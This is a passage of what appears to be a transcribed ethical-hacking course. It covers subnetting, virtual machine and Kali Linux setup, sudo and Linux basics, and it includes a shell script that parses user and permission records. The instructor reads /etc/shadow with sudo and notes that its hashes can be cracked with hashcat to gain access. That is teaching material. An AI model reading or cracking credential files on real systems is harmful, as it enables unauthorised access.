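                    "192.168.1.0/23", "192.168.2.0/23", "10.1.0.0/16"):
        info = describe(example)
        print(example, info, "ok" if matches_stdlib(example) else "MISMATCH")
```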
Once you've hit that maximum, that 1.255, then guess what, you start at 2. You have a whole new network here. Just like these smaller segments, you get whole new networks on the bigger side as well. So what you need to know is that if I would have put something like a 192.168.1.0/23, that would have fallen into line with the 1 and the zero, and our actual network ID still would have been 0.0, and a 1.255 would have been the broadcast here. And you can double check this any time you're confused; you can double check your CIDR notation. So I'm going to bring over a website that I will show you here, and this is just an IP addressing guide. It's called ipaddressguide.com. You bring this over and you scroll down just a little bit, and I just put in 192.168.1.0/23, and you can see that it actually corrects me and says the first bit is 192.168.0.0, the last one is 192.168.1.255, total hosts is 512 minus 2. Shows you that again: first IP, last IP, you got your netmask. Very easy to use a CIDR calculator here, or an IP range to convert to CIDR as well, so very useful calculators. But if you're not allowed to use these for, like, an exam purpose or something along those lines, then using the cheat sheet that I've shown you is super useful. Now what I want to do is I want to try three more subnets, okay? I'm going to write these out. I'm going to say 192.168.0.0, 192.168.1.0/26 and 192.168.1.0/25. I want you to solve these for me: tell me the subnet mask, the hosts, network and broadcast. And with that being said, this again is a very complicated topic. I did not pick this up the first time or the second time that I got it. If you're running confused right now, perfectly normal. You can go back and watch this video again, try to pick up more topics, try to understand it. Maybe I'm not the right instructor for this either; I do recommend looking at other resources to completely fill in your knowledge gap if there is one that exists. Another resource that I'll link down is what it's called, Seven Second Subnetting. It is very useful; a lot of students have recommended it to me. I'm gonna push it forward as well. So go ahead and try to solve this. Understand that what you're after here is just understanding what a subnet is, okay? When you see something like this, if a client sends you 192.168.1.0/24, you're gonna say hey, okay, I know that there's probably 254 hosts in that network and I know what I'm working with. If you see this, 255.255.255.0, again you know that you're working with a slash 24 network. Very standard stuff; that's what we're after. I don't expect you to ever memorize this. I don't have this memorized. Like, I don't come in here and say, you know, a slash 18 is a 255.255.192.0 network and it's got 16384 hosts. I don't do that, okay? I have a cheat sheet, I'll use a website if I need to. For the most part what you need to understand is 254 hosts for a slash 24; if that number has gone up to like a slash 28 you know you're dealing with less; if that number is lower, like a slash 16, you know you're dealing with a bigger network. That's really what it comes down to, unless you are working in networking and then these become more important. But as a pen tester, understanding how to read this, understanding what the subnet is, and just identifying it with very basic measures, this is extremely useful. So I will catch you over in the next video when we talk about solving these challenges, and hopefully we got them all right. So I'll see you over there in the next one.

All right, so in order to be successful in this course we are going to be utilizing what is called a virtual machine. Now virtual machines are known as VMs for short, and a VM is just a machine on top of a machine. And to give you an example, I'm actually running this Windows 10 instance that you see here on top of my Windows 10 instance. So here you can see, if I scroll up, that I have a Windows 10 machine; I also have a Linux machine sitting here. If I were to de-maximize this you can see that I'm actually running here a Windows machine in the back
this is my wife and I, and you come through here, we just blow it back up and we're back inside of our machine. So a virtual machine is just a machine inside of a machine. So what we're going to be doing is we're going to be utilizing this to build out labs; that way we don't have to actually have a bunch of hardware, we can just use this for our course and run what we need to on top of our own machine already. Now this can get resource intensive, so if you are only utilizing something like eight gigabytes of RAM then you might have some issues with this, but you can still follow along. When we get into the Active Directory portion you might run into issues if you do not have at least 16 gigabytes of RAM to utilize, but we'll worry about that when we get there. There are still plenty of ways to follow along throughout this whole course. So another thing to note is that I use VMs every single day. This machine that you see here is actually my day-to-day pen testing machine, so I run a Kali Linux instance on top of my Windows machine and utilize that to do penetration testing. So I'm going to demonstrate that to you and how we're going to build out our labs with that, and a lot of us in the industry run through VMs as opposed to running it directly on metal, or on a machine. So in order to utilize virtual machines we first need some sort of virtual machine software to play these. So there are two different ways that we can do this. If you are on a Windows machine or a Linux machine you can utilize VMware Workstation Player. Now if you type in "vmware workstation player" in Google, the first one here that says Download VMware Workstation Player, you just click on that. And if you are in a Mac environment you're going to be utilizing Oracle VirtualBox, so if you type in "oracle virtualbox" you come here and you go to Downloads; you have your option there as well. So in this course I will be using VMware Workstation Player. I'm going to be running it on top of Windows. If you are using Mac that is absolutely fine; you're going to be following along just the same. All you need to be able to do is follow the same instructions that I give you and you will be A-okay. So if you scroll down here you can see Try Workstation Player for Windows or Try Workstation Player for Linux. Go ahead and just select Download Now; that should bring up a download, and go ahead and save it. If you're doing VirtualBox go ahead and download for OS X. I will download the Windows version just so that we can see what that looks like as well, so I'll save both of these. So let's view our downloads and we've got VMware Workstation Player here. I'm going to go ahead and open this one and we're going to install this, and this will be very point and click. So Next, accept the agreement, possibly give away our first child, yeah. We should go ahead and install the enhanced keyboard driver while we have this, and then we don't need to join any improvement programs or check for product updates, that's okay. We will install desktop, start menu; check your preferences as you like it. I'm just going to install this and this should just finish here in just a second. Okay, then you'll be brought to this screen once everything's done; it should take about a minute or two, and we're going to go ahead and hit Finish, and it's going to want a restart to take effect. You can go ahead and restart your system; I'm going to say no right now. Let's go ahead and install VirtualBox if you are a Mac user. We'll hit Next, Next here, Next and Yes, and Install. Accept, and again very point and click with the installation: select Install and any options that do pop up, and then we can start Oracle VM if we want. Let's go ahead and just start that. This is what Oracle VM looks like, and let's see if we can start the VMware Player here even though we need to restart, and this is what VMware Workstation Player looks like. So here you can see that we have virtual machines, we can create new virtual machines, open ones, etc. We'll get into that
in the next video. So again, if you are using Windows or Linux this is probably what your view is going to look like for the rest of the time; if you are using Oracle on a Mac this is what your view is going to look like. Another side pro tip here is that I am using Workstation Pro, and I might utilize this in some instances throughout the course; other instances I'll be utilizing the Workstation Player. There is not much of a difference, especially in the beginning. When we get into the Active Directory portion it might actually be worth it for you all to download the VMware Pro trial, because the trial is 30 days and you can utilize that to get through some sections and actually have nice little windows here to be clean and just have a Pro edition. You can do everything I'm going to show you in the course on the Player; it just is that, if you want to run more than one machine, you'll just have to reopen the VMware Workstation Player several times to run multiple machines. But that's okay; it just won't look like this nice clean layout where you can transfer between machines like I can do just here. So with that being said, let's go ahead and move on to the next video. We're going to be installing Kali Linux onto our VMware Workstation Player.

All right, so now that we have our VMware Player installed we're going to need to put a VM on top of that. So throughout this course we're going to be utilizing Linux, more specifically we're going to be utilizing a Linux called Kali Linux. Now if you've never used Linux before, that's absolutely okay. We have a section coming up on introductory Linux and we'll get you completely up to speed, but for now we need to be able to install Linux so that we can use it. And Kali Linux is a Debian-based version of Linux and it is a pen tester Linux, so this is completely built for ethical hacking, as you're going to see once we dive into it. So I've gone ahead and just went to Google and typed in "kali linux download", and if we scroll down we're going to skip this first section here. Let's scroll down to this Kali Linux custom image downloads from Offensive Security. We're going to click on this link and we're going to scroll down a bit, and you can see that there are Kali Linux VMware images. Now if you're utilizing VMware, this is exactly what you're going to use here, and if you're using VirtualBox then you're going to use this down here. Since we are using VMware I'm going to go ahead and select the 64-bit download here. So we're going to download 64-bit; you can either download it just by clicking or you can download the torrent as well. So this is going to download a 7-Zip file. I'm going to go ahead and just hit download and save, and this is going to take a second; this is 2.2 gig. So go ahead and pause the video; once your download is complete we'll go ahead and start from there. Okay, so the download has finished and I'm going to go ahead and select open. Now if you do not have 7-Zip installed on your machine you're going to need to install 7-Zip, so you can go out to Google and just say "7zip download", and if you go to download 7-Zip right here, download the appropriate one for you. Here is the executable 64-bit for Windows, so go ahead and download this one, install it, again point-and-click, and you'll have 7-Zip on your machine. So once you have that, come back here and we're going to need to extract this. So go ahead and get your file extracted. I'm going to do that really quick, and I'm dragging this over just to show you; it's going to take some time. I'm just putting it in my Downloads folder. So again, we're just dealing with a lot of data compressed; I think it's 2.2 gigs, uncompressed around 9 or 10 gigs, so make sure you have the space as well when you do extract this. So once this is done extracting on your machine, go ahead and unpause the video and come back, and then we'll actually get Kali Linux up and running. Okay, so now I've got my VMware Workstation Player open, our files are extracted. I'm going to go ahead and
just select Open a Virtual Machine, and I've navigated to the folder that I needed to get to, which is just my Downloads folder with this Kali 2019.3. I'm gonna go ahead and open that, and now you should see the files open. Before we go ahead and do this, let's go ahead and just select Edit virtual machine settings, and there's a couple things that we need to talk about in here. So the amount of memory that you allocate depends on the amount of memory that you have, so here it tells you the recommended amount and the amount that you have maximum available. So for my system, for example, I have 32 gigabytes of RAM. Now I would probably give this machine somewhere between four and maybe eight gigabytes; I would say four gigabytes. If you do not have a lot of RAM, go ahead and leave it at two gigabytes. Two gigabytes is fine; you might notice a tiny bit of slowness, but it's nothing that's going to keep you behind by any means. So I'm going to bump this one up to 4096, which is four gigabytes, and I'm also going to take a look at the network adapter. Now we haven't gotten into networking yet, but we're going to cover some of these topics. So NAT is a protocol that we can use, or we can use bridged. Go ahead and leave it for now at NAT; if we need to change it to bridged later we will. NAT should be perfectly fine. If you don't know what that is, that's okay; we're going to cover that here in a little bit. So we'll select OK and we're just going to hit Power On, and when you get this prompt all you have to say is "I copied it", and it's going to boot up your Kali Linux machine. Now this is the first time booting it; sometimes you can full screen it, sometimes you can't. As of right now we just tried to full screen it, doesn't work yet. So go ahead and let this boot up; it shouldn't take but just a second. Okay, and now we're going to be brought to this login screen here, and the password is going to be, well, the user is going to be kali, password is going to be kali, and you just log in. Might take a second to log in on the first go. Now you'll be brought to this screen. Now what you may or may have not noticed is that this is a perhaps different version of Kali that you're running. Things do change as the videos go on. What you're hearing on this video is actually an update from where we were at; as you saw me installing, I was installing 2019.3. As we are working through the course I'm actually going ahead and doing updates, so this is now 2020.4 and we are adding updates to the course. So the notes that I have for you before we move into the Linux section is, if you're installing Kali and it looks a little bit different, that's okay. These versions do change over time; sometimes they do get major updates. When that happens I update the course. Here we are on the latest and greatest as of right now, so this is kind of what it looks like, but don't be too worried if your image or background or things look a little bit different. Everything that you're going to learn is 95% the same, for the most part. So let's go ahead and move forward. We're going to go and move to the next section, where we start talking about Kali Linux, and we start talking about an overview of what Kali Linux is and how to navigate around it, and we'll talk about Linux and Linux commands as well. So I look forward to seeing you in the next section.

Okay, so this video pertains to some updates we need to make to VirtualBox for quality of life. So if you're not using VirtualBox you can go ahead and skip this video; if you are, buckle in. We just need to do a couple of quick updates and then we should be good for the rest of the course. So go ahead and go out to Google and google "virtualbox extension pack". What it's going to bring up is just the downloads page of VirtualBox, so we're going to want to go here, and on this page if you look kind of towards the middle you'll see that there is a VirtualBox Extension Pack here. We're going to just click All Supported Platforms and that will automatically download the file that we need. So once
that is downloaded in pause if you need to go ahead and open virtualbox and you can come in here and up at the top we're going to go ahead and click on preferences and from here we are interested in extensions see extensions right here go ahead and click on that there's a little plus sign we're gonna go ahead and click on that and then you should have your downloads right here so we're gonna take the downloads and just go ahead and install that hit install read this give away your firstborn accept all the terms and you should be good very quick install okay the second thing we need to do is we need to come to the one tab up here above which is network we're going to go ahead and hit the network button or this add button and we're gonna add what is called a nat network okay and we're gonna come in here and we're going to double click and you can go ahead and keep these defaults i'm gonna actually change them to 192.168.57.0 because that's what's going to be used through the rest of the course and that is what the cider notation of my cali machine and my keyoptrix which you'll see later etc all fell into this 57.0 so we're going to go ahead and keep it on this network make sure you support dhcp go ahead and just hit ok hit ok and then for a machine and make sure any machine that you use again any machine that you use in this course make sure you set it to nat network if you're using virtualbox so you can come in here click on a machine like this mail machine i have here you can just click on that settings go to network and then you can go ahead and just go to nat network all right and that name right here you see name net network that's all we're going to use that'll automatically set it up so when you have a cali machine running later and you have key optics or another box running or even when we build out an active directory lab you need to make sure that you're running that net network so that all the machines are on the same subnet if you don't you might run into 
a situation where the same ip comes up for the same machine and then they're conflicting with each other or you get on different networks and some weird stuff happens so make sure again that it's imperative that you're setting that net network for every single machine that you're setting up so with that said we're gonna go ahead and move on to the next video in this section the first thing i'd like to do before we get started with any commands or anything like that just take a look around kali linux and kind of demonstrate why a pen tester or ethical hacker might use this distribution of linux now throughout the course as stated in the last video you might see a different version of this pop up as i recorded videos on some of the older versions everything should still work just as is you just might see a different look and feel to some of the cali interface but all the commands i'm going to show you everything that we do is going to be the same so let's take a look and just explore kali linux just for a bit so if we come up here into the corner and we just click on the little cali logo you can see that we have nice things broken out for us so we've got these favorites up here which we have our terminal which we're going to be living in essentially we've got a text editor we've got a web browser which is basically firefox we've got some other tools down here docs etc the other thing that we can come scroll through is we can see that we have different applications in here if we look at the different sections these kind of go in order which we haven't covered quite yet but in the order of how a hack might go down so information gathering is usually the first step you can come in here look through this and here's a bunch of tools related to information gathering you can even click into these and go deeper if you wanted to related to specific things so dns or smb or open source intelligence all of this that's in here this is just built in tools so let's say we're coming 
in here we want to do a wireless attack well we go to wireless stacks we've got a bunch of tools already built in so kali linux is just essentially a ethical hacking distribution of linux and it's built on debian so if you've ever used something like ubuntu or anything along those lines of a debian distribution this is all going to feel really familiar to you with just a bunch of tools built in on top of it so fairly straightforward they do have some nice tools in here you can come through and utilize these a lot of this is already built in and we're going to take a look at that as we go okay so the next thing that we're going to do is and throughout the rest of this course is start looking at the terminal so if you come up here you'll see that we have a terminal now mostly everything that we do is going to be done in this terminal here now this is almost like accessing the command line so if you're using a command line like in windows for example if you ever use command line if not that's okay but we do a lot of this from this interface as opposed to maybe utilizing a gui base interface where if we clicked a folder this might look more familiar to you if you're a windows or mac user you come in here you have this kind of area yeah yeah we can do that and sometimes we'll utilize this but a lot of times we're going to be living right here okay so as we move forward we're going to start talking about this command line how we can utilize it and use it to our advantage and then we'll do some tips and tricks and hopefully learn some pretty neat stuff as we go so in the next video i'm going to cover the pseudo feature which i think is important it's something that was brought in now originally we had something called a root permission and we'll talk about that that has changed since 2020.1 moving forward so we're introducing that into this course and we'll talk options that you have so let's go ahead and move to the next video where we talk about the pseudo feature all 
right so before we look at any commands or learn any command line we have to talk about sudo sudo is very important and what had happened previously was that in the earlier versions of kali linux we ran as a user called root root is the ultimate user you could think of it as the administrator of the machine now we're running as a user called cali so we don't have root privileges directly this is as an improved security feature because we should be running only certain commands when we need to as the root user so we're going to see is we're going to see how we can run commands as an elevated privilege we're going to do that with sudo which stands for super user do they just kind of shortened it so we just have sudo now okay now with sudo what we're doing is we're saying hey i want to run a command elevated i want to run this as a higher user in this instance we can say i want to run the command as root why is that important well let's take a look at an example let's say that i wanted to look at a very sensitive file now one sensitive file in our system is the etsy shadow file you can see cat etsy like this etsy shadow and you don't have to follow along right now you don't have to really understand what's going on if you've never seen linux all i'm doing is saying hey i want to print out this file i want to look at it okay and for here i can't see it it says permission denied you don't have the access to see this file that's a good thing but if i was the root user or somebody that had elevated privileges i could see it so i could say sudo cat etsy shadow like this okay and it's gonna say what is your password for cali i'm gonna go ahead and say cali k-a-l-i hit enter and now i can see that i have access to this file and this file is very sensitive we'll talk about this later on in the course but sends it a file okay so when we're looking at it i ran that command specifically as the root user as the root user i'm able to see okay this file now why or what's going on 
here well we're running that specific command right and we're still staying as cali we're doing this in a kind of one-off scenario so there will be times where something that you run in this course might require sudo or you can run the command without sudo but you notice something doesn't work so best practice for this is saying hey let's go ahead and just run mostly everything that i'm showing you command-wise in this course that's not best practice overall usually you should run things just as a regular user if you get permissions blocked then run it as sudo as necessary now the other thing to point out and we'll talk about this again in later on in the course but why can we do this is because this user is part of what's called a sudoers file meaning we can have this permission not any user can come in here say we made a new user and we just call the user john we can't just take john and just go ahead and just run these commands as root no john has to have the permission to do this so you can think of cali as being an administrator but only when we utilize that access or that privilege okay the other thing i want to show you though is that we can switch over to root if we want to we can come in here and we can say sudo switch user dash just like that and that'll put us into root now you can see okay we're running root at cali and that's only for this instance you can if you want i'm not going to demonstrate how to do this but you can if you want change the root password log out and log back in as root and run through this course as root again that's not best security practice but that feature is available to you if you are a linux user that is comfortable with linux comfortable with running as root and you want the easy path otherwise i highly recommend just staying as cali running as pseudo privileges as you need it and then moving forward but this is a quick way to switch into root if you need to sometimes even running sudo causes some issues so switching to 
route to run a command is okay what we can do here too is the demonstration is we can go file new tab and look at a new instance and you'll see that this instance of root is only good for this tab here once we start a new tab we're going to be brought back right back to cali cali you can see that from the top line in the tab as well so just keep note of this when you're running commands in this course if you see something again try running it with sudo if it's not working or if it says access denied then you know hey i need to run sudo very very very important okay i'm trying to drive that in into your brains right now so from here we're going to move on we're going to start looking at how to navigate around the file system taking a look at everything from a bigger picture and diving into terminal so i will see you over in the next video okay so now our first lesson in linux terminology is going to be navigating the file system so if you're a windows user you're used to navigating your file system probably through folders through a gui so a graphical user interface well in linux we can do that but the majority of time we're going to live in this terminal here so we really need to know how to get around so the first thing we can do here is we can say hey where are we at and that's pwd so that stands for present working directory so you type that in you hit enter and it says okay we're in the root folder so we know that we're in the root folder but how do we get out of the root folder we can use a command called cd and that stands for change directory so if we want to change directory backwards we just type in two dots here and now we can say okay where are we at so we're in a slash so we're just in a home folder here or just there our generic slash folder right so what we can do is well how do we know can we go backwards from here let's keep trying so we do pwd again no we can't this is our base folder right so you have to think of this as the the lowest you can go 
So now how do we move around? How do we know how to go forwards again? Well, we don't know what's in our directories, right; so we're sitting in this slash folder, and how do we look around? So there's a command called ls that lists everything that's in the folder. So if we say ls we kind of see this color coordinated here, and the color coordination just depends on if it's a folder, if the folder's read... right, you know, there's permission settings which we're going to get into later, but the majority of these here are folders. Okay, well we know we just came out of root, so we can go back into root. Now how do we do that? So we can say change directory root, and we can actually hit tab to autocomplete. I don't know if you caught that, but there's no folder besides root that starts with r, so at "r" I can just hit tab and it should type it out for me. Oh, I lied, there is a "run" in here somewhere, but it's hidden; we're going to cover that soon as well. So "ro", hit tab, autocomplete, and change directory into root. So let's ls in root and see what's in here. Okay, this is more like our home folder, right; so we've got Desktop, Documents, Downloads; this is kind of what applies to the root user. So what if we're sitting in this root folder here and we wanted to access instead this etc folder? Well, could we do the same etc command here? Well, I'm hitting tab and nothing's happening, because etc doesn't belong in this area, right. But if we put a forward slash in front of it, because this is the base, and then we hit etc there, now we can navigate to the /etc folder, and we can actually double tab and see what's all in the /etc folder, like an ls would show. Another way to do that is, if we wanted to ls what's in the /etc folder without navigating to it, we could just type ls /etc and you can see everything that's in here. So there's some tricks that we can do, right; so we don't have to actually navigate to the folder to know what's in there. Again, if we ls and we want to know what's sitting in Videos, or even let's say what's sitting in Desktop for our folder, well, if we start typing "desktop" and hit tab, we can't do that either, because everything in Linux is case sensitive. So if we start typing "Desktop" and then hit tab, now we can ls and see what's in there. So our VMware came with a couple of shell scripts here that are automatically placed on our desktop; if we wanted to confirm that, you could see that they're both right here. So as of right now we are just sitting in our root home folder and we know how to navigate around. So if we wanted to go to Desktop we could; we could hit ls now and see what's in there; if we wanted to go backwards we could. Okay, now we're back in our root folder, and you can also tell where you're at: your present working directory sits right here, right. So this little tilde is actually your home folder, and you can see that we're in Desktop. So if we wanted to go back into our desktop... say you wanted to go to Music from your Desktop; instead of going root Music, which will work, you could also just say I want to go ~/Music, and that will put you there as well, and notice you don't need the leading forward slash when you use the tilde. So just a couple of interesting tricks that you'll kind of pick up along the way. Tab is definitely going to be your best friend. If you run into something with multiple options, say you're trying to cd and you say I want to go to my Desktop and you're tabbing and it's not working, you can hit double tab and then it'll show you, okay, well, there's Desktop, Documents, Downloads; those are your three options that start with the D. So now you kind of have an idea as to how to move around, but let's do a little bit more. So what if we want to make our own folder? Well, there's something called make directory, mkdir. So if we say make directory, we'll say, I'm just going to use my name, heath. So now if we ls we can see that this heath folder is now here; we can go into the heath folder and there should be nothing in it, right. So we can go back, and we can also get rid of the heath folder: remove directory heath. If we ls again, it's gone. So now what else can we do? Well, we can also look for hidden folders, so we can say ls -la and we can look for hidden files and folders here. Remember the color coordination; so this .cache, right, that in theory is a hidden folder. So if we say cd .cache we can go into there, we ls, and there's actually some information in there, but when you saw it originally you didn't see that. We're going to cover more on this; I just kind of want to show you that trick. As you see over on the left side there's file permissions and properties, so be aware that just because it looks like something's not there doesn't mean it's not there; it might just actually be hidden, similar to Windows where you have hidden files and folders. So just a quick trick to show you that. So another thing we can do, so let's go back, and don't worry about what I'm doing here, you're going to cover these commands in a little bit: I'm just going to echo "hi" and we're going to put that in a test.txt folder. So now if we ls you can see that test.txt is here. So if we want to actually copy this file, we can copy this file to another location; so we can say, hey, I've got this test.txt but I actually want to move it to Downloads, and if we ls Downloads you could see that test.txt is actually sitting in there. And if we wanted to remove it, we can just say remove from Downloads, or test.txt... actually, sorry, remove Downloads/test.txt; we don't have to transition into that directory if we don't want to. So another trick: say we want to see now that it's gone, and we want to ls, but we want to keep typing this out. If you hit the up arrow now you can just see your old commands, so if you keep typing a command over and over you can see what's going on. So ls shows that there's nothing in Downloads now; we were able to successfully remove that file. So another thing that we can do is we can actually move; so say we wanted to move test.txt and we wanted to put that into Downloads. Okay, now if we ls, test.txt is now gone from this folder because we've moved it; we haven't made a copy, we've actually physically moved it away. So now if we ls... actually let's just tab up; you can see that test.txt is now in there, and I'm going to remove that here. Okay, and now the last thing I want to show you is the locate feature. So if we wanted to locate a file, say I wanted to locate bash, let's see; so we're looking for a file, and we're going to get more specific along the way, but if you type in locate you can kind of look through a system to see if you can find it. Now I'm looking for, say, any type of bin bash, or /bin/bash; that's fine, that's really what I wanted, but it shows you everything with bash in it. Now this might not work right away; what you might need to do is update the database, so you type in updatedb, it updates everything for you, and then you can use locate again. So it has to build that database of the information that it's finding in order to locate what you're searching for, so make sure that you use updatedb sort of frequently. Okay, so two more things I want to show you and then we'll close out this video and move on to the next one. So an important thing you want to do with your new account is... we're using a default password and that's not very secure, so to change the password for our user we can just type in passwd, and now it's going to ask us for a new password. So instead of using toor we can use something else; I'm going to type in "the very secure password" as my password for an example here, but if you plan on using this machine for future reference you can type in a secure password and kind of keep it. So lastly I want to show you something called man, so man pages. Man pages are your instructions for any command that you're running; most commands come with a man page. So let's say we want to look at ls; we can say man ls and then it's going to give us all this information here about ls. So if you see it says "ls - list directory contents", awesome, and then it gives you what options we can do. Well, we can do a -a for all, which you saw earlier, and you can kind of scroll through here and just see exactly what it has to offer, and that's kind of it. So when you go through here, you can kind of, you know, if you're struggling, like, you know there's a command in there but you're not sure exactly what the command is, you can type in man and search it. And sometimes you can do ls, I don't know if this is going to work, but --help, and you get some information as well; it doesn't provide you the full man pages, but it provides you something pretty close. So that's kind of just your way around if you ever get stuck, something to look for. Okay, so that's it for this lesson; next we're going to move on to users and privileges, how to add users and how to change some sudo and some modifications to our file permissions.

Okay, so now we're going to cover users and privileges. So in the last video we touched a little bit on privileges with our ls -la, and we touched a little bit on users by changing the password of our root account. So now we'll cover a few more commands regarding those. So if we look again at ls -la, you could see all this crazy jumbled wordage over here, right; so it actually means something. So we look at the first line here: if we see a dash like this, a hyphen, that means it's a file; if we see a d, that means it's actually a directory. And then you see r, w and x; so r, w and x actually means read, write, execute; it's the permission settings that this particular group has. Now there are three groups here; there's the first, second, and then your third right here, right. So your first group right here is the owner of the file, so it looks like the owner of the file has full read, write, execute, right. And then the next set of three here is actually the permissions for the members of the group that own the file, so this is a group ownership as opposed to actual ownership here. So for the people that are in the group that has access to this file, they can only read and execute; they can't write to it. Now for the last one, this is just all other users, so any common user here can actually just read and execute; they can't write to the document. So that comes into play especially when we get into penetration testing, because with penetration testing we're looking to have full access, right; so we're always going to be looking for that folder that has full read-write. Typically, if we look at tmp, that's our temp folder; a lot of times you see the temp folder has full read, write, execute. So when we're doing penetration testing, if we're trying to upload some sort of exploit, we might actually upload it into the temp folder, because that's where we can execute those files. However, we could also be looking for other full read-write-execute files where we need to modify them and give us root access to a system. So it's all about insecure configurations, and we're going to cover that more once we get into the actual penetration testing part of the course. So for the Linux essentials part of the course, all we need to worry about is these file permissions. Another important feature of that is, if we were to create a script, our script's not going to be able to run until it has full access. So how do we change access here? So let's make a file; I'm just going to make... we'll just echo another text document, right, so we'll just say "hello", and actually I typed that in backwards, so "hello", and we'll call it hello.txt. So if we ls here, by default we only have read, write, and then read access for everybody else, meaning if we wanted to read it we could say cat, which we're going to get into later, cat hello.txt; it just says hello. So what can we do here? Well, we can use something called change mode, and changing mode is chmod, and we have a couple options here. So we can do a plus, right, and we could say, well, we want read, write, execute, or we just want execute. But another way I like doing it is you have a number feature, so the one you really need to know is all sevens; sevens gives you full read-write access across the board. So if we say chmod 777 hello.txt, now we ls -la and you notice that hello.txt turns green; that means it is full read-write, and here you go, we've got the dash here saying it's a file and we've got read, write, execute across the board. So this is how we change file permissions. You don't need to necessarily know about the other numbers in terms of penetration testing; it becomes more in terms of configuration and security management of files, if you were to get down that path. So to stay on the easiest path, just remember 777, or +x will work as well. So changing the mode is critical, and we're going to cover it time and time again throughout the course once we get a little bit deeper. So a couple more things we need to talk about. Say we wanted to add a new user; well, there's a feature called add user. So we say adduser, and one or two names is allowed; so we need to add user, say, john. Okay, so it made something for john; let's give him a password, give him a password again, and we'll just hit enter for the defaults, it's all correct. Okay, so we now have a username john, and we can confirm that: we can actually cat the /etc/passwd file here, and you see down at the very bottom we have this user john. So this /etc/passwd file you're going to become very familiar with, because it shows you all the users. Now there's a lot of times where you're doing penetration testing where you're going to have access to this /etc/passwd file, because it doesn't provide the password anymore; it used to a long time ago. Passwords are now in the shadow file. So you actually have a little bit of access and information disclosure here at the hands of poor configuration. So you see that I've created a user john; well, that gives us a little bit of information. Say there's SSH on a machine or something else; we can use that username of john to try to break into the machine. So we'll cover that again later, but if we wanted to see what the /etc/shadow file looks like now, we come in here and you've got this jumbled stuff here, right; so it's just a hashing format. So what we're doing is we can actually use a tool like hashcat to break this down and crack these passwords. Now a password, "password", will be very easy, but just know that if you have access to the /etc/shadow file you have a good chance of cracking a password, depending on your capabilities and depending on the strength of the password, and that'll allow you access to a machine. So something to think about there. Okay, so now we have our user john; let's go ahead and switch to him. So we can use something called su, which stands for switch user, and we'll say switch user john. Okay, so it automatically gave us john here. Let's see if we can switch back to root. Okay, we can't just switch back to root, because we need root's password, right; so we can type in "password" and that works, but if we didn't know the password then we'd be stuck on john. We were able to access john because we were already root, so this comes into play in terms of users. Let's go back to john here. Now if you're a user, you have to be able to do certain things; you need permission to do certain things, I should say, right. So root has full access and permission to do everything, but john, we just created john; john doesn't have any sort of access. So if we wanted to change the password, say we want to change the password for root, I can't modify the password information because I don't have that kind of access. Now there is something called sudo which would provide john that access if we gave it to him; so it's called a sudoers file, and basically anybody in that sudoers file can change permissions, given that they are a sudo user, right. So we would type in sudo passwd root and it's going to ask for the password for john, but you're going to notice, hey, john's not in the sudoers file; john can't do this. So john has base permissions, right, and we're going to encounter that a lot of times in penetration testing, where if we get in we'll get something called lower privilege, and we'll get an account like john, and we're going to try to escalate into root, but we just can't do it. You know, the chances of doing that and having a john in a sudoers file is just not high; it's possible, but it's not likely. So for now just know that if you want a user other than root to have access to file permissions, you need to have them in the sudoers file. That becomes useful too in penetration testing, because you can look at the sudoers file, if you have access, to see what users have sudo privileges. Okay, so that is it for this lesson; in the next lesson we're going to be covering network commands and moving on gradually towards scripting. So let's go ahead and get there, and I will see you when we get over there.

Okay, so now let's cover network commands. So the first command I want to cover is ifconfig. So you may be familiar with the Windows version of this, which is ipconfig, and they pretty much do the same thing. So it shows you here your different interface types and the IP address associated with them; so eth0 here, Ethernet 0, has an IP address of 192.168.132.164.
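The users-and-privileges lesson above (the ls -la permission bits, chmod 777, the /etc/passwd and /etc/shadow split, and who is in the sudoers group) as an added worked example; this is not code from the course or from the instructor. It is a small POSIX shell script that decodes the mode column of ls -l into the octal digits chmod takes, reads a file's mode back after chmod, lists the world-writable entries that 777 creates, and pulls login users and sudo-group members out of passwd- and group-formatted text. The /etc/passwd and /etc/group lines inside it are constructed samples, and treating membership in the "sudo" group as the sudo-privilege check is an assumption (it is the Debian/Kali default grant; rules in /etc/sudoers and /etc/sudoers.d are not parsed).

```shell
#!/bin/sh
# Added example (not from the course): inspecting Linux file modes and
# user/privilege records with POSIX shell, ls, find and awk.

# decode_mode: turn the symbolic mode column printed by `ls -l`
# (e.g. "-rwxr-xr-x") into the octal digits chmod understands (e.g. 755).
# Characters 2-10 hold the owner, group and other triplets; the leading
# character is the file type (- file, d directory, l symlink, ...).
# setuid/setgid/sticky are folded into the execute bit (s and t count as x).
decode_mode() {
    perms=$(printf '%s' "$1" | cut -c2-10)
    octal=""
    for start in 1 4 7; do
        triple=$(printf '%s' "$perms" | cut -c"$start"-"$((start + 2))")
        digit=0
        case $triple in r??) digit=$((digit + 4)) ;; esac
        case $triple in ?w?) digit=$((digit + 2)) ;; esac
        case $triple in ??[xst]) digit=$((digit + 1)) ;; esac
        octal="$octal$digit"
    done
    printf '%s\n' "$octal"
}

# file_mode: the octal mode of an existing path, read back through ls -ld
# (-d so a directory is described itself instead of being listed).
file_mode() {
    decode_mode "$(ls -ld "$1" | cut -c1-10)"
}

# world_writable: every entry under a directory whose "others" write bit
# is set (-perm -002), i.e. what chmod 777 hands to any local user.
world_writable() {
    find "$1" -perm -002 -print
}

# login_users: usernames from /etc/passwd-format text on stdin whose shell
# (field 7) is a real shell, skipping nologin/false service accounts.
# Field 2 is just "x" because the hash lives in /etc/shadow, as the lesson says.
login_users() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }'
}

# group_members: members of one group from /etc/group-format text on stdin
# (field 4 is a comma-separated member list). On Debian-based systems such
# as Kali the default /etc/sudoers grants the "sudo" group, so its members
# are the users who can run sudo (assumption: no extra rules in
# /etc/sudoers or /etc/sudoers.d).
group_members() {
    awk -F: -v g="$1" '$1 == g {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }'
}

# Constructed sample records in /etc/passwd and /etc/group format.
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kali:x:1000:1000:Kali,,,:/home/kali:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/bash'

GROUP_SAMPLE='root:x:0:
sudo:x:27:kali
john:x:1001:'

demo() {
    echo "decode -rwxr-xr-x -> $(decode_mode '-rwxr-xr-x')"
    dir=$(mktemp -d)
    echo hello > "$dir/hello.txt"
    chmod 644 "$dir/hello.txt"
    echo "hello.txt after chmod 644: $(file_mode "$dir/hello.txt")"
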